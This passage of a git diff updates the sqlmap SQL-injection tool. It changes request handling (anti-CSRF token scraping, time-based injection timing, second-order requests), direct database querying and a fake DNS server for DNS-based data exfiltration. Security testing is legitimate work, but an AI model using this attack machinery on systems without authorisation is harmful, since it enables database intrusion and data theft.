PLACE.POST): _ = re.escape(PAYLOAD_DELIMITER) - match = re.search("(?P<name>\w+)=%s(?P<value>.+?)%s" % (_, _), value) + match = re.search(r"(?P<name>\w+)=%s(?P<value>.+?)%s" % (_, _), value) if match: payload = match.group("value") @@ -658,17 +1178,19 @@ def queryPage(value=None, place=None, content=False, getRatioValue=False, silent if place: value = agent.removePayloadDelimiters(value) - if conf.checkPayload: - checkPayload(value) - if PLACE.GET in conf.parameters: get = conf.parameters[PLACE.GET] if place != PLACE.GET or not value else value + elif place == PLACE.GET: # Note: for (e.g.) checkWaf() when there are no GET parameters + get = value if PLACE.POST in conf.parameters: post = conf.parameters[PLACE.POST] if place != PLACE.POST or not value else value + elif place == PLACE.POST: + post = value if PLACE.CUSTOM_POST in conf.parameters: - post = conf.parameters[PLACE.CUSTOM_POST].replace(CUSTOM_INJECTION_MARK_CHAR, "") if place != PLACE.CUSTOM_POST or not value else value + post = conf.parameters[PLACE.CUSTOM_POST].replace(kb.customInjectionMark, "") if place != PLACE.CUSTOM_POST or not value else value + post = post.replace(ASTERISK_MARKER, '*') if post else post if PLACE.COOKIE in conf.parameters: cookie = conf.parameters[PLACE.COOKIE] if place != PLACE.COOKIE or not value else value @@ -688,161 +1210,446 @@ def queryPage(value=None, place=None, content=False, getRatioValue=False, silent uri = conf.url if value and place == PLACE.CUSTOM_HEADER: - if not auxHeaders: - auxHeaders = {} - auxHeaders[value.split(',')[0]] = value.split(',', 1)[1] + if value.split(',')[0].capitalize() == PLACE.COOKIE: + cookie = value.split(',', 1)[-1] + else: + auxHeaders[value.split(',')[0]] = value.split(',', 1)[-1] + + if conf.csrfToken: + token = AttribDict() + + def _adjustParameter(paramString, parameter, newValue): + retVal = paramString + + if urlencode(parameter) in paramString: + parameter = urlencode(parameter) + + match = re.search(r"%s=[^&]*" % re.escape(parameter), paramString, re.I) + if match: + retVal = re.sub(r"(?i)%s" % re.escape(match.group(0)), ("%s=%s" % (parameter, newValue)).replace('\\', r'\\'), paramString) + else: + match = re.search(r"(%s[\"']\s*:\s*[\"'])([^\"']*)" % re.escape(parameter), paramString, re.I) + if match: + retVal = re.sub(r"(?i)%s" % re.escape(match.group(0)), "%s%s" % (match.group(1), newValue), paramString) + + return retVal + + for attempt in xrange(conf.csrfRetries + 1): + if token: + break + + if attempt > 0: + warnMsg = "unable to find anti-CSRF token '%s' at '%s'" % (conf.csrfToken._original, conf.csrfUrl or conf.url) + warnMsg += ". sqlmap is going to retry the request" + logger.warning(warnMsg) + + page, headers, code = Connect.getPage(url=conf.csrfUrl or conf.url, post=conf.csrfData or (conf.data if conf.csrfUrl == conf.url and (conf.csrfMethod or "").upper() == HTTPMETHOD.POST else None), method=conf.csrfMethod or (conf.method if conf.csrfUrl == conf.url else None), cookie=conf.parameters.get(PLACE.COOKIE), direct=True, silent=True, ua=conf.parameters.get(PLACE.USER_AGENT), referer=conf.parameters.get(PLACE.REFERER), host=conf.parameters.get(PLACE.HOST)) + page = urldecode(page) # for anti-CSRF tokens with special characters in their name (e.g. 'foo:bar=...') + + match = re.search(r"(?i)<input[^>]+\bname=[\"']?(?P<name>%s)\b[^>]*\bvalue=[\"']?(?P<value>[^>'\"]*)" % conf.csrfToken, page or "", re.I) + + if not match: + match = re.search(r"(?i)<input[^>]+\bvalue=[\"']?(?P<value>[^>'\"]*)[\"']?[^>]*\bname=[\"']?(?P<name>%s)\b" % conf.csrfToken, page or "", re.I) + + if not match: + match = re.search(r"(?P<name>%s)[\"']:[\"'](?P<value>[^\"']+)" % conf.csrfToken, page or "", re.I) + + if not match: + match = re.search(r"\b(?P<name>%s)\s*[:=]\s*(?P<value>\w+)" % conf.csrfToken, getUnicode(headers), re.I) + + if not match: + match = re.search(r"\b(?P<name>%s)\s*=\s*['\"]?(?P<value>[^;'\"]+)" % conf.csrfToken, page or "", re.I) + + if not match: + match = re.search(r"<meta\s+name=[\"']?(?P<name>%s)[\"']?[^>]+\b(value|content)=[\"']?(?P<value>[^>\"']+)" % conf.csrfToken, page or "", re.I) + + if match: + token.name, token.value = match.group("name"), match.group("value") + + match = re.search(r"String\.fromCharCode\(([\d+, ]+)\)", token.value) + if match: + token.value = "".join(_unichr(int(_)) for _ in match.group(1).replace(' ', "").split(',')) + + if not token: + if conf.csrfUrl and conf.csrfToken and conf.csrfUrl != conf.url and code == _http_client.OK: + if headers and PLAIN_TEXT_CONTENT_TYPE in headers.get(HTTP_HEADER.CONTENT_TYPE, ""): + token.name = conf.csrfToken + token.value = page + + if not token and conf.cj and any(re.search(conf.csrfToken, _.name, re.I) for _ in conf.cj): + for _ in conf.cj: + if re.search(conf.csrfToken, _.name, re.I): + token.name, token.value = _.name, _.value + if not any(re.search(conf.csrfToken, ' '.join(_), re.I) for _ in (conf.paramDict.get(PLACE.GET, {}), conf.paramDict.get(PLACE.POST, {}))): + if post: + post = "%s%s%s=%s" % (post, conf.paramDel or DEFAULT_GET_POST_DELIMITER, token.name, token.value) + elif get: + get = "%s%s%s=%s" % (get, conf.paramDel or DEFAULT_GET_POST_DELIMITER, token.name, token.value) + else: + get = "%s=%s" % (token.name, token.value) + break + + if not token: + errMsg = "anti-CSRF token '%s' can't be found at '%s'" % (conf.csrfToken._original, conf.csrfUrl or conf.url) + if not conf.csrfUrl: + errMsg += ". You can try to rerun by providing " + errMsg += "a valid value for option '--csrf-url'" + raise SqlmapTokenException(errMsg) + + if token: + token.value = token.value.strip("'\"") + + for candidate in (PLACE.GET, PLACE.POST, PLACE.CUSTOM_POST, PLACE.URI): + if candidate in conf.parameters: + if candidate == PLACE.URI and uri: + uri = _adjustParameter(uri, token.name, token.value) + elif candidate == PLACE.GET and get: + get = _adjustParameter(get, token.name, token.value) + elif candidate in (PLACE.POST, PLACE.CUSTOM_POST) and post: + post = _adjustParameter(post, token.name, token.value) + + for i in xrange(len(conf.httpHeaders)): + if conf.httpHeaders[i][0].lower() == token.name.lower(): + conf.httpHeaders[i] = (conf.httpHeaders[i][0], token.value) if conf.rParam: def _randomizeParameter(paramString, randomParameter): retVal = paramString - match = re.search("%s=(?P<value>[^&;]+)" % randomParameter, paramString) + match = re.search(r"(\A|\b)%s=(?P<value>[^&;]*)" % re.escape(randomParameter), paramString) if match: origValue = match.group("value") - retVal = re.sub("%s=[^&;]+" % randomParameter, "%s=%s" % (randomParameter, randomizeParameterValue(origValue)), paramString) + newValue = randomizeParameterValue(origValue) if randomParameter not in kb.randomPool else random.sample(kb.randomPool[randomParameter], 1)[0] + retVal = re.sub(r"(\A|\b)%s=[^&;]*" % re.escape(randomParameter), "%s=%s" % (randomParameter, newValue), paramString) + else: + match = re.search(r"(\A|\b)(%s\b[^\w]+)(?P<value>\w+)" % re.escape(randomParameter), paramString) + if match: + origValue = match.group("value") + newValue = randomizeParameterValue(origValue) if randomParameter not in kb.randomPool else random.sample(kb.randomPool[randomParameter], 1)[0] + retVal = paramString.replace(match.group(0), "%s%s" % (match.group(2), newValue)) return retVal for randomParameter in conf.rParam: - for item in (PLACE.GET, PLACE.POST, PLACE.COOKIE): + for item in (PLACE.GET, PLACE.POST, PLACE.COOKIE, PLACE.URI, PLACE.CUSTOM_POST): if item in conf.parameters: if item == PLACE.GET and get: get = _randomizeParameter(get, randomParameter) - elif item == PLACE.POST and post: + elif item in (PLACE.POST, PLACE.CUSTOM_POST) and post: post = _randomizeParameter(post, randomParameter) elif item == PLACE.COOKIE and cookie: cookie = _randomizeParameter(cookie, randomParameter) + elif item == PLACE.URI and uri: + uri = _randomizeParameter(uri, randomParameter) if conf.evalCode: - delimiter = conf.pDel or DEFAULT_GET_POST_DELIMITER - variables = {} + delimiter = conf.paramDel or DEFAULT_GET_POST_DELIMITER + variables = {"uri": uri, "lastPage": threadData.lastPage, "_locals": locals(), "cookie": cookie} originals = {} - for item in filter(None, (get, post)): + if not get and PLACE.URI in conf.parameters: + query = _urllib.parse.urlsplit(uri).query or "" + else: + query = None + + for item in filterNone((get, post if not kb.postHint else None, query)): for part in item.split(delimiter): if '=' in part: name, value = part.split('=', 1) - evaluateCode("%s=%s" % (name, repr(value)), variables) + name = name.strip() + if safeVariableNaming(name) != name: + conf.evalCode = re.sub(r"\b%s\b" % re.escape(name), safeVariableNaming(name), conf.evalCode) + name = safeVariableNaming(name) + value = urldecode(value, convall=True, spaceplus=(item == post and kb.postSpaceToPlus)) + variables[name] = value + + if post and kb.postHint in (POST_HINT.JSON, POST_HINT.JSON_LIKE): + for name, value in (parseJson(post) or {}).items(): + if safeVariableNaming(name) != name: + conf.evalCode = re.sub(r"\b%s\b" % re.escape(name), safeVariableNaming(name), conf.evalCode) + name = safeVariableNaming(name) + variables[name] = value + + if cookie: + for part in cookie.split(conf.cookieDel or DEFAULT_COOKIE_DELIMITER): + if '=' in part: + name, value = part.split('=', 1) + name = name.strip() + if safeVariableNaming(name) != name: + conf.evalCode = re.sub(r"\b%s\b" % re.escape(name), safeVariableNaming(name), conf.evalCode) + name = safeVariableNaming(name) + value = urldecode(value, convall=True) + variables[name] = value + + while True: + try: + compile(getBytes(re.sub(r"\s*;\s*", "\n", conf.evalCode)), "", "exec") + except SyntaxError as ex: + if ex.text: + original = replacement = getUnicode(ex.text.strip()) + + if '=' in original: + name, value = original.split('=', 1) + name = name.strip() + if safeVariableNaming(name) != name: + replacement = re.sub(r"\b%s\b" % re.escape(name), safeVariableNaming(name), replacement) + else: + for _ in re.findall(r"[A-Za-z_]+", original)[::-1]: + if safeVariableNaming(_) != _: + replacement = replacement.replace(_, safeVariableNaming(_)) + break + + if original == replacement: + conf.evalCode = conf.evalCode.replace(EVALCODE_ENCODED_PREFIX, "") + break + else: + conf.evalCode = conf.evalCode.replace(getUnicode(ex.text.strip(), UNICODE_ENCODING), replacement) + else: + break + else: + break originals.update(variables) evaluateCode(conf.evalCode, variables) - for name, value in variables.items(): - if name != "__builtins__" and originals.get(name, "") != value: - if isinstance(value, (basestring, int)): - value = unicode(value) - if '%s=' % name in (get or ""): - get = re.sub("((\A|\W)%s=)([^%s]+)" % (name, delimiter), "\g<1>%s" % value, get) - elif '%s=' % name in (post or ""): - post = re.sub("((\A|\W)%s=)([^%s]+)" % (name, delimiter), "\g<1>%s" % value, post) - elif post is not None: - post += "%s%s=%s" % (delimiter, name, value) - else: - get += "%s%s=%s" % (delimiter, name, value) - - if not skipUrlEncode: + for variable in list(variables.keys()): + if unsafeVariableNaming(variable) != variable: + entry = variables[variable] + del variables[variable] + variables[unsafeVariableNaming(variable)] = entry + + uri = variables["uri"] + cookie = variables["cookie"] + + for name, entry in variables.items(): + if name != "__builtins__" and originals.get(name, "") != entry: + if isinstance(entry, (int, float, six.string_types, six.binary_type)): + found = False + entry = getUnicode(entry, UNICODE_ENCODING) + + if kb.postHint == POST_HINT.MULTIPART: + boundary = "--%s" % re.search(r"boundary=([^\s]+)", contentType).group(1) + if boundary: + parts = post.split(boundary) + match = re.search(r'\bname="%s"' % re.escape(name), post) + if not match and parts: + parts.insert(2, parts[1]) + parts[2] = re.sub(r'\bname="[^"]+".*', 'name="%s"' % re.escape(name), parts[2]) + for i in xrange(len(parts)): + part = parts[i] + if re.search(r'\bname="%s"' % re.escape(name), part): + match = re.search(r"(?s)\A.+?\r?\n\r?\n", part) + if match: + found = True + first = match.group(0) + second = part[len(first):] + second = re.sub(r"(?s).+?(\r?\n?\-*\Z)", r"%s\g<1>" % re.escape(entry), second) + parts[i] = "%s%s" % (first, second) + post = boundary.join(parts) + + elif kb.postHint and re.search(r"\b%s\b" % re.escape(name), post or ""): + if kb.postHint in (POST_HINT.XML, POST_HINT.SOAP): + if re.search(r"<%s\b" % re.escape(name), post): + found = True + post = re.sub(r"(?s)(<%s\b[^>]*>)(.*?)(</%s)" % (re.escape(name), re.escape(name)), r"\g<1>%s\g<3>" % entry.replace('\\', r'\\'), post) + elif re.search(r"\b%s>" % re.escape(name), post): + found = True + post = re.sub(r"(?s)(\b%s>)(.*?)(</[^<]*\b%s>)" % (re.escape(name), re.escape(name)), r"\g<1>%s\g<3>" % entry.replace('\\', r'\\'), post) + + elif kb.postHint in (POST_HINT.JSON, POST_HINT.JSON_LIKE): + match = re.search(r"['\"]%s['\"]:" % re.escape(name), post) + if match: + quote = match.group(0)[0] + post = post.replace("\\%s" % quote, BOUNDARY_BACKSLASH_MARKER) + match = re.search(r"(%s%s%s:\s*)(\d+|%s[^%s]*%s)" % (quote, re.escape(name), quote, quote, quote, quote), post) + if match: + found = True + post = post.replace(match.group(0), "%s%s" % (match.group(1), entry if entry.isdigit() else "%s%s%s" % (match.group(0)[0], entry, match.group(0)[0]))) + post = post.replace(BOUNDARY_BACKSLASH_MARKER, "\\%s" % quote) + + regex = r"\b(%s)\b([^\w]+)(\w+)" % re.escape(name) + if not found and re.search(regex, (post or "")): + found = True + post = re.sub(regex, r"\g<1>\g<2>%s" % entry.replace('\\', r'\\'), post) + + regex = r"((\A|%s)%s=).+?(%s|\Z)" % (re.escape(delimiter), re.escape(name), re.escape(delimiter)) + if not found and re.search(regex, (post or "")): + found = True + post = re.sub(regex, r"\g<1>%s\g<3>" % entry.replace('\\', r'\\'), post) + + if re.search(regex, (get or "")): + found = True + get = re.sub(regex, r"\g<1>%s\g<3>" % entry.replace('\\', r'\\'), get) + + if re.search(regex, (query or "")): + found = True + uri = re.sub(regex.replace(r"\A", r"\?"), r"\g<1>%s\g<3>" % entry.replace('\\', r'\\'), uri) + + regex = r"((\A|%s\s*)%s=).+?(%s|\Z)" % (re.escape(conf.cookieDel or DEFAULT_COOKIE_DELIMITER), re.escape(name), re.escape(conf.cookieDel or DEFAULT_COOKIE_DELIMITER)) + if re.search(regex, (cookie or "")): + found = True + cookie = re.sub(regex, r"\g<1>%s\g<3>" % entry.replace('\\', r'\\'), cookie) + + if not found: + if post is not None: + if kb.postHint in (POST_HINT.JSON, POST_HINT.JSON_LIKE): + match = re.search(r"['\"]", post) + if match: + quote = match.group(0) + post = re.sub(r"\}\Z", "%s%s}" % (',' if re.search(r"\w", post) else "", "%s%s%s:%s" % (quote, name, quote, entry if entry.isdigit() else "%s%s%s" % (quote, entry, quote))), post) + else: + post += "%s%s=%s" % (delimiter, name, entry) + elif get is not None: + get += "%s%s=%s" % (delimiter, name, entry) + elif cookie is not None: + cookie += "%s%s=%s" % (conf.cookieDel or DEFAULT_COOKIE_DELIMITER, name, entry) + + if not conf.skipUrlEncode: get = urlencode(get, limit=True) if post is not None: if place not in (PLACE.POST, PLACE.CUSTOM_POST) and hasattr(post, UNENCODED_ORIGINAL_VALUE): post = getattr(post, UNENCODED_ORIGINAL_VALUE) - elif not skipUrlEncode and kb.postHint not in POST_HINT_CONTENT_TYPES.keys(): + elif postUrlEncode: post = urlencode(post, spaceplus=kb.postSpaceToPlus) - if timeBasedCompare: - if len(kb.responseTimes) < MIN_TIME_RESPONSES: + if timeBasedCompare and not conf.disableStats: + if len(kb.responseTimes.get(kb.responseTimeMode, [])) < MIN_TIME_RESPONSES: clearConsoleLine() + kb.responseTimes.setdefault(kb.responseTimeMode, []) + if conf.tor: warnMsg = "it's highly recommended to avoid usage of switch '--tor' for " - warnMsg += "time-based injections because of its high latency time" + warnMsg += "time-based injections because of inherent high latency time" singleTimeWarnMessage(warnMsg) - warnMsg = "time-based comparison needs larger statistical " - warnMsg += "model. Making a few dummy requests, please wait.." + warnMsg = "[%s] [WARNING] %stime-based comparison requires " % (time.strftime("%X"), "(case) " if kb.responseTimeMode else "") + warnMsg += "%s statistical model, please wait" % ("larger" if len(kb.responseTimes) == 1 else "reset of") + dataToStdout(warnMsg) + + while len(kb.responseTimes[kb.responseTimeMode]) < MIN_TIME_RESPONSES: + _ = kb.responseTimePayload.replace(RANDOM_INTEGER_MARKER, str(randomInt(6))).replace(RANDOM_STRING_MARKER, randomStr()) if kb.responseTimePayload else kb.responseTimePayload + Connect.queryPage(value=_, content=True, raise404=False) + dataToStdout('.') + + dataToStdout(" (done)\n") + + elif not kb.testMode: + warnMsg = "it is very important to not stress the network connection " + warnMsg += "during usage of time-based payloads to prevent potential " + warnMsg += "disruptions " singleTimeWarnMessage(warnMsg) - while len(kb.responseTimes) < MIN_TIME_RESPONSES: - Connect.queryPage(content=True) + if not kb.laggingChecked: + kb.laggingChecked = True - deviation = stdev(kb.responseTimes) + deviation = stdev(kb.responseTimes[kb.responseTimeMode]) - if deviation > WARN_TIME_STDEV: + if deviation is not None and deviation > WARN_TIME_STDEV: kb.adjustTimeDelay = ADJUST_TIME_DELAY.DISABLE - warnMsg = "there is considerable lagging " + warnMsg = "considerable lagging has been detected " warnMsg += "in connection response(s). Please use as high " warnMsg += "value for option '--time-sec' as possible (e.g. " - warnMsg += "%d or more)" % (conf.timeSec * 2) + warnMsg += "10 or more)" logger.critical(warnMsg) - elif not kb.testMode: - warnMsg = "it is very important not to stress the network adapter's " - warnMsg += "bandwidth during usage of time-based queries" - singleTimeWarnMessage(warnMsg) - - if conf.safUrl and conf.saFreq > 0: + if (conf.safeFreq or 0) > 0: kb.queryCounter += 1 - if kb.queryCounter % conf.saFreq == 0: - Connect.getPage(url=conf.safUrl, cookie=cookie, direct=True, silent=True, ua=ua, referer=referer, host=host) + if kb.queryCounter % conf.safeFreq == 0: + if conf.safeUrl: + Connect.getPage(url=conf.safeUrl, post=conf.safePost, cookie=cookie, direct=True, silent=True, ua=ua, referer=referer, host=host) + elif kb.safeReq: + Connect.getPage(url=kb.safeReq.url, post=kb.safeReq.post, method=kb.safeReq.method, auxHeaders=kb.safeReq.headers) start = time.time() if kb.nullConnection and not content and not response and not timeBasedCompare: noteResponseTime = False - if kb.nullConnection == NULLCONNECTION.HEAD: - method = HTTPMETHOD.HEAD - elif kb.nullConnection == NULLCONNECTION.RANGE: - if not auxHeaders: - auxHeaders = {} + try: + pushValue(kb.pageCompress) + kb.pageCompress = False - auxHeaders[HTTPHEADER.RANGE] = "bytes=-1" + if kb.nullConnection == NULLCONNECTION.HEAD: + method = HTTPMETHOD.HEAD + elif kb.nullConnection == NULLCONNECTION.RANGE: + auxHeaders[HTTP_HEADER.RANGE] = "bytes=-1" - _, headers, code = Connect.getPage(url=uri, get=get, post=post, cookie=cookie, ua=ua, referer=referer, host=host, silent=silent, method=method, auxHeaders=auxHeaders, raise404=raise404) + _, headers, code = Connect.getPage(url=uri, get=get, post=post, method=method, cookie=cookie, ua=ua, referer=referer, host=host, silent=silent, auxHeaders=auxHeaders, raise404=raise404, skipRead=(kb.nullConnection == NULLCONNECTION.SKIP_READ)) - if headers: - if kb.nullConnection == NULLCONNECTION.HEAD and HTTPHEADER.CONTENT_LENGTH in headers: - pageLength = int(headers[HTTPHEADER.CONTENT_LENGTH]) - elif kb.nullConnection == NULLCONNECTION.RANGE and HTTPHEADER.CONTENT_RANGE in headers: - pageLength = int(headers[HTTPHEADER.CONTENT_RANGE][headers[HTTPHEADER.CONTENT_RANGE].find('/') + 1:]) + if headers: + try: + if kb.nullConnection in (NULLCONNECTION.HEAD, NULLCONNECTION.SKIP_READ) and headers.get(HTTP_HEADER.CONTENT_LENGTH): + pageLength = int(headers[HTTP_HEADER.CONTENT_LENGTH].split(',')[0]) + elif kb.nullConnection == NULLCONNECTION.RANGE and headers.get(HTTP_HEADER.CONTENT_RANGE): + pageLength = int(headers[HTTP_HEADER.CONTENT_RANGE][headers[HTTP_HEADER.CONTENT_RANGE].find('/') + 1:]) + except ValueError: + pass + finally: + kb.pageCompress = popValue() - if not pageLength: + if pageLength is None: try: - page, headers, code = Connect.getPage(url=uri, get=get, post=post, cookie=cookie, ua=ua, referer=referer, host=host, silent=silent, method=method, auxHeaders=auxHeaders, response=response, raise404=raise404, ignoreTimeout=timeBasedCompare) + page, headers, code = Connect.getPage(url=uri, get=get, post=post, method=method, cookie=cookie, ua=ua, referer=referer, host=host, silent=silent, auxHeaders=auxHeaders, response=response, raise404=raise404, ignoreTimeout=timeBasedCompare) except MemoryError: page, headers, code = None, None, None warnMsg = "site returned insanely large response" if kb.testMode: warnMsg += " in testing phase. This is a common " - warnMsg += "behavior in custom WAF/IDS/IPS solutions" + warnMsg += "behavior in custom WAF/IPS solutions" singleTimeWarnMessage(warnMsg) - if conf.secondOrder: - page, headers, code = Connect.getPage(url=conf.secondOrder, cookie=cookie, ua=ua, silent=silent, auxHeaders=auxHeaders, response=response, raise404=False, ignoreTimeout=timeBasedCompare, refreshing=True) + if not ignoreSecondOrder: + if conf.secondUrl: + page, headers, code = Connect.getPage(url=conf.secondUrl, cookie=cookie, ua=ua, silent=silent, auxHeaders=auxHeaders, response=response, raise404=False, ignoreTimeout=timeBasedCompare, refreshing=True) + elif kb.secondReq and IPS_WAF_CHECK_PAYLOAD not in _urllib.parse.unquote(value or ""): + def _(value): + if kb.customInjectionMark in (value or ""): + if payload is None: + value = value.replace(kb.customInjectionMark, "") + else: + try: + value = re.sub(r"\w*%s" % re.escape(kb.customInjectionMark), payload, value) + except re.error: + value = re.sub(r"\w*%s" % re.escape(kb.customInjectionMark), re.escape(payload), value) + return value + page, headers, code = Connect.getPage(url=_(kb.secondReq[0]), post=_(kb.secondReq[2]), method=kb.secondReq[1], cookie=kb.secondReq[3], silent=silent, auxHeaders=dict(auxHeaders, **dict(kb.secondReq[4])), response=response, raise404=False, ignoreTimeout=timeBasedCompare, refreshing=True) threadData.lastQueryDuration = calculateDeltaSeconds(start) - kb.originalCode = kb.originalCode or code + kb.originalCode = code if kb.originalCode is None else kb.originalCode + kb.originalPage = page if kb.originalPage is None else kb.originalPage if kb.testMode: kb.testQueryCount += 1 if timeBasedCompare: - return wasLastRequestDelayed() + return wasLastResponseDelayed() elif noteResponseTime: - kb.responseTimes.append(threadData.lastQueryDuration) + kb.responseTimes.setdefault(kb.responseTimeMode, []) + kb.responseTimes[kb.responseTimeMode].append(threadData.lastQueryDuration) + if len(kb.responseTimes[kb.responseTimeMode]) > MAX_TIME_RESPONSES: + kb.responseTimes[kb.responseTimeMode] = kb.responseTimes[kb.responseTimeMode][-MAX_TIME_RESPONSES // 2:] if not response and removeReflection: page = removeReflectiveValues(page, payload) kb.maxConnectionsFlag = re.search(MAX_CONNECTIONS_REGEX, page or "", re.I) is not None - kb.permissionFlag = re.search(PERMISSION_DENIED_REGEX, page or "", re.I) is not None + + message = extractRegexResult(PERMISSION_DENIED_REGEX, page or "", re.I) + if message: + kb.permissionFlag = True + singleTimeWarnMessage("potential permission problems detected ('%s')" % message) + + headers = patchHeaders(headers) if content or response: - return page, headers + return page, headers, code if getRatioValue: return comparison(page, headers, code, getRatioValue=False, pageLength=pageLength), comparison(page, headers, code, getRatioValue=True, pageLength=pageLength) - elif pageLength or page: - return comparison(page, headers, code, getRatioValue, pageLength) else: - return False + return comparison(page, headers, code, getRatioValue, pageLength) + +def setHTTPHandlers(): # Cross-referenced function + raise NotImplementedError diff --git a/lib/request/direct.py b/lib/request/direct.py index 6014fd12de1..171f37151d6 100644 --- a/lib/request/direct.py +++ b/lib/request/direct.py @@ -1,22 +1,22 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ +import re import time -from extra.safe2bin.safe2bin import safecharencode from lib.core.agent import agent from lib.core.common import Backend from lib.core.common import calculateDeltaSeconds from lib.core.common import extractExpectedValue from lib.core.common import getCurrentThreadData -from lib.core.common import getUnicode from lib.core.common import hashDBRetrieve from lib.core.common import hashDBWrite from lib.core.common import isListLike +from lib.core.convert import getUnicode from lib.core.data import conf from lib.core.data import kb from lib.core.data import logger @@ -24,7 +24,9 @@ from lib.core.enums import CUSTOM_LOGGING from lib.core.enums import DBMS from lib.core.enums import EXPECTED +from lib.core.enums import TIMEOUT_STATE from lib.core.settings import UNICODE_ENCODING +from lib.utils.safe2bin import safecharencode from lib.utils.timeout import timeout def direct(query, content=True): @@ -33,7 +35,7 @@ def direct(query, content=True): query = agent.adjustLateValues(query) threadData = getCurrentThreadData() - if Backend.isDbms(DBMS.ORACLE) and query.startswith("SELECT ") and " FROM " not in query: + if Backend.isDbms(DBMS.ORACLE) and query.upper().startswith("SELECT ") and " FROM " not in query.upper(): query = "%s FROM DUAL" % query for sqlTitle, sqlStatements in SQL_STATEMENTS.items(): @@ -42,22 +44,34 @@ def direct(query, content=True): select = False break - if select and not query.upper().startswith("SELECT "): - query = "SELECT %s" % query + if select: + if re.search(r"(?i)\ASELECT ", query) is None: + query = "SELECT %s" % query + + if conf.binaryFields: + for field in conf.binaryFields: + field = field.strip() + if re.search(r"\b%s\b" % re.escape(field), query): + query = re.sub(r"\b%s\b" % re.escape(field), agent.hexConvertField(field), query) logger.log(CUSTOM_LOGGING.PAYLOAD, query) output = hashDBRetrieve(query, True, True) start = time.time() - if not select and "EXEC " not in query: - _ = timeout(func=conf.dbmsConnector.execute, args=(query,), duration=conf.timeout, default=None) - elif not (output and "sqlmapoutput" not in query and "sqlmapfile" not in query): - output = timeout(func=conf.dbmsConnector.select, args=(query,), duration=conf.timeout, default=None) - hashDBWrite(query, output, True) + if not select and re.search(r"(?i)\bEXEC ", query) is None: + timeout(func=conf.dbmsConnector.execute, args=(query,), duration=conf.timeout, default=None) + elif not (output and ("%soutput" % conf.tablePrefix) not in query and ("%sfile" % conf.tablePrefix) not in query): + output, state = timeout(func=conf.dbmsConnector.select, args=(query,), duration=conf.timeout, default=None) + if state == TIMEOUT_STATE.NORMAL: + hashDBWrite(query, output, True) + elif state == TIMEOUT_STATE.TIMEOUT: + conf.dbmsConnector.close() + conf.dbmsConnector.connect() elif output: infoMsg = "resumed: %s..." % getUnicode(output, UNICODE_ENCODING)[:20] logger.info(infoMsg) + threadData.lastQueryDuration = calculateDeltaSeconds(start) if not output: diff --git a/lib/request/dns.py b/lib/request/dns.py index 85d111c06e4..1be54888274 100644 --- a/lib/request/dns.py +++ b/lib/request/dns.py @@ -1,70 +1,110 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ +from __future__ import print_function + +import binascii import os import re import socket +import struct import threading import time class DNSQuery(object): """ - Used for making fake DNS resolution responses based on received - raw request - - Reference(s): - http://code.activestate.com/recipes/491264-mini-fake-dns-server/ - https://code.google.com/p/marlon-tools/source/browse/tools/dnsproxy/dnsproxy.py + >>> DNSQuery(b'|K\\x01 \\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x01\\x03www\\x06google\\x03com\\x00\\x00\\x01\\x00\\x01\\x00\\x00)\\x10\\x00\\x00\\x00\\x00\\x00\\x00\\x0c\\x00\\n\\x00\\x08O4|Np!\\x1d\\xb3')._query == b"www.google.com." + True + >>> DNSQuery(b'\\x00')._query == b"" + True """ def __init__(self, raw): self._raw = raw - self._query = "" + self._query = b"" - type_ = (ord(raw[2]) >> 3) & 15 # Opcode bits + try: + type_ = (ord(raw[2:3]) >> 3) & 15 # Opcode bits - if type_ == 0: # Standard query - i = 12 - j = ord(raw[i]) + if type_ == 0: # Standard query + i = 12 + j = ord(raw[i:i + 1]) - while j != 0: - self._query += raw[i + 1:i + j + 1] + '.' - i = i + j + 1 - j = ord(raw[i]) + while j != 0: + self._query += raw[i + 1:i + j + 1] + b'.' + i = i + j + 1 + j = ord(raw[i:i + 1]) + except TypeError: + pass def response(self, resolution): """ Crafts raw DNS resolution response packet """ - retVal = "" + retVal = b"" if self._query: - retVal += self._raw[:2] # Transaction ID - retVal += "\x85\x80" # Flags (Standard query response, No error) - retVal += self._raw[4:6] + self._raw[4:6] + "\x00\x00\x00\x00" # Questions and Answers Counts - retVal += self._raw[12:(12 + self._raw[12:].find("\x00") + 5)] # Original Domain Name Query - retVal += "\xc0\x0c" # Pointer to domain name - retVal += "\x00\x01" # Type A - retVal += "\x00\x01" # Class IN - retVal += "\x00\x00\x00\x20" # TTL (32 seconds) - retVal += "\x00\x04" # Data length - retVal += "".join(chr(int(_)) for _ in resolution.split('.')) # 4 bytes of IP + retVal += self._raw[:2] # Transaction ID + retVal += b"\x85\x80" # Flags (Standard query response, No error) + retVal += self._raw[4:6] + self._raw[4:6] + b"\x00\x00\x00\x00" # Questions and Answers Counts + retVal += self._raw[12:(12 + self._raw[12:].find(b"\x00") + 5)] # Original Domain Name Query + retVal += b"\xc0\x0c" # Pointer to domain name + retVal += b"\x00\x01" # Type A + retVal += b"\x00\x01" # Class IN + retVal += b"\x00\x00\x00\x20" # TTL (32 seconds) + retVal += b"\x00\x04" # Data length + retVal += b"".join(struct.pack('B', int(_)) for _ in resolution.split('.')) # 4 bytes of IP return retVal class DNSServer(object): + """ + Used for making fake DNS resolution responses based on received + raw request + + Reference(s): + https://code.activestate.com/recipes/491264-mini-fake-dns-server/ + https://web.archive.org/web/20150418152405/https://code.google.com/p/marlon-tools/source/browse/tools/dnsproxy/dnsproxy.py + """ + def __init__(self): + self._check_localhost() self._requests = [] self._lock = threading.Lock() - self._socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + + try: + self._socket = socket._orig_socket(socket.AF_INET, socket.SOCK_DGRAM) + except AttributeError: + self._socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + self._socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) self._socket.bind(("", 53)) self._running = False + self._initialized = False + + def _check_localhost(self): + response = b"" + s = None + + try: + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.settimeout(1.0) + s.connect(("", 53)) + s.send(binascii.unhexlify("6509012000010000000000010377777706676f6f676c6503636f6d00000100010000291000000000000000")) # A www.google.com + response = s.recv(512) + except: + pass + 